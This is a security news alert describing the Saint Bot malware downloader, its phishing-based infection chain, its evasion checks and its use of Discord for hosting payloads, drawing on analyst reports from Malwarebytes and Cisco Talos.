Warning — New Malware Alert: User Passwords at Risk!

A new and previously unknown malware downloader, referred to as “Saint Bot,” has emerged in recent phishing campaigns, designed to deploy credential-stealing malware and other malicious payloads. This downloader is reported to have made its debut in January 2021 and appears to be actively evolving in its capabilities.

Saint Bot operates as a downloader and has gained traction within the cybercriminal community. It has been reported to facilitate the distribution of various stealers, such as the Taurus Stealer, alongside further secondary loaders. Aleksandra “Hasherezade” Doniec, a threat intelligence analyst at Malwarebytes, noted that its framework is versatile enough to distribute different types of malware, indicating a sophisticated and flexible design strategy.

The infection chain, as outlined by cybersecurity analysts, begins with a phishing email featuring an embedded ZIP file, misleadingly labeled “bitcoin.zip.” While it masquerades as a legitimate bitcoin wallet, it is actually a PowerShell script disguised as a .LNK shortcut file. This script activates the downloading of a subsequent malware stage, characterized as a WindowsUpdate.exe executable. This executable subsequently launches InstallUtil.exe, which is responsible for retrieving two additional executables, def.exe and putty.exe.

The def.exe executable functions as a batch script aimed at disabling Windows Defender, while putty.exe ultimately establishes a connection to a command-and-control (C2) server, facilitating further exploitation. Each stage of this malware exhibits obfuscation tactics coupled with anti-analysis measures, enabling operators to exploit compromised devices discreetly.

Saint Bot implements various mechanisms to perform “self-defense checks,” including verifying whether it is being executed in a virtual environment or is under analysis through debugging. Additionally, the malware is designed not to execute within Romania and specific countries in the Commonwealth of Independent States (CIS), such as Armenia, Belarus, Kazakhstan, Moldova, Russia, and Ukraine, which further suggests an awareness of its operational geography.

The command capabilities of Saint Bot extend to downloading and executing additional payloads from the C2 server, updating the bot itself, and uninstalling from infected machines. While these functionalities may seem limited, the malware’s role as a downloader accentuates its potential for considerable harm to cybersecurity defenses.

In a notable tactical choice, Saint Bot retrieves its payloads from files hosted on Discord, reflecting a rising trend among threat actors who exploit legitimate platform functionalities for their C2 communications, thereby evading traditional security measures. Researchers from Cisco Talos highlighted that files uploaded to the Discord CDN can be accessed externally using hardcoded URLs, creating an avenue for malware distribution without requiring the Discord application to be installed.

Overall, while Saint Bot represents a nascent downloader not as advanced as some of its predecessors like SmokeLoader, its ongoing development and the sophistication of techniques employed indicate a potential increase in threat levels. The methods observed, while fundamentally rooted in established malware practices, reveal an evolving landscape in cyber threats requiring continuous vigilance from business owners and cybersecurity professionals alike.